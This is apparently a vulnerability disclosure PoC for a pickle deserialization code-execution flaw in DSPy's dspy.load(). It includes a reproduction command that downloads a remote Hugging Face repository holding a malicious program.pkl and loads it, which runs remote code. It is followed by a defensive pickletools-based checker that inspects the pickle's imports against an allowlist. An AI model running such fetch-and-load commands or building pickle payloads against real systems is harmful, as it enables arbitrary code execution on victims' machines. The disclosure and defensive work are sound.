DSPy cloudpickle.load() RCE PoC
Security research PoC for huntr submission.
Vulnerability: dspy.load() in dspy/utils/saving.py:23 deserializes program.pkl with
cloudpickle.load(), which is unrestricted pickle.load(): there is no weights_only mode
and no restricted unpickler. Any __reduce__-based payload in program.pkl therefore
executes at load time.
Affected version: dspy-ai 2.6.27 (latest)
Reproduction
pip install dspy-ai
python3 -c "
import dspy
from huggingface_hub import snapshot_download
path = snapshot_download('th3-j0k3r/dspy-cloudpickle-poc')
dspy.load(path)
print(open('/tmp/dspy_rce_hf.txt').read())
"
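A defensive pre-load check for an artifact like program.pkl, as an added example that is neither DSPy code nor part of this PoC: it walks the opcode stream with pickletools without unpickling anything, lists every global the stream would import, and refuses the load unless all of them sit inside an allowlist. The allowlist and the two sample pickles are constructed for illustration.

```python
# Static pre-load check for an untrusted pickle such as program.pkl. Nothing here
# unpickles the data: pickletools.genops only parses opcodes, so a __reduce__
# payload cannot fire during the check.
import os
import pickle
import pickletools

# Hypothetical allowlist: top-level modules a trusted program.pkl may reference.
ALLOWED_MODULES = {"builtins", "collections", "dspy"}
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}
NO_PUSH_OPS = {"PROTO", "FRAME", "MEMOIZE", "STOP"}


def referenced_globals(data: bytes) -> list[tuple[str, str]]:
    """(module, name) for every GLOBAL / STACK_GLOBAL opcode in the stream.
    STACK_GLOBAL operands come from a minimal model of recent pushes; anything
    it cannot resolve is reported as "<unresolved>" so the check fails closed."""
    found, recent = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":                  # protocols 0-3: "module name"
            found.append(tuple(arg.split(" ", 1)))
            recent.append(None)
        elif op.name == "STACK_GLOBAL":          # protocol 4+: operands on stack
            mod, name = (recent[-2], recent[-1]) if len(recent) >= 2 else (None, None)
            if isinstance(mod, str) and isinstance(name, str):
                found.append((mod, name))
            else:
                found.append(("<unresolved>", "<unresolved>"))
            del recent[-2:]
            recent.append(None)                  # the resolved global itself
        elif op.name in STRING_OPS:
            recent.append(arg)
        elif op.name not in NO_PUSH_OPS:
            recent.append(None)                  # some non-string value
    return found


def check_pickle(data: bytes) -> tuple[bool, list[str]]:
    """Return (safe_to_load, reasons) without executing anything from data."""
    reasons = [f"disallowed global {m}.{n}" for m, n in referenced_globals(data)
               if m.split(".")[0] not in ALLOWED_MODULES]
    if reasons and any(op.name == "REDUCE" for op, _a, _p in pickletools.genops(data)):
        reasons.append("REDUCE present: a __reduce__ payload would run on load")
    return (not reasons, reasons)


# Constructed samples (not real DSPy artifacts): a plain dict, and a pickle that
# merely references os.getenv, which is already enough to refuse the load.
BENIGN_PICKLE = pickle.dumps({"lm": "demo-model", "demos": [1, 2]}, protocol=4)
SUSPICIOUS_PICKLE = pickle.dumps(os.getenv, protocol=4)
```

Run the check on the bytes of program.pkl before handing the file to dspy.load(); a non-empty reasons list means the artifact should not be loaded at all.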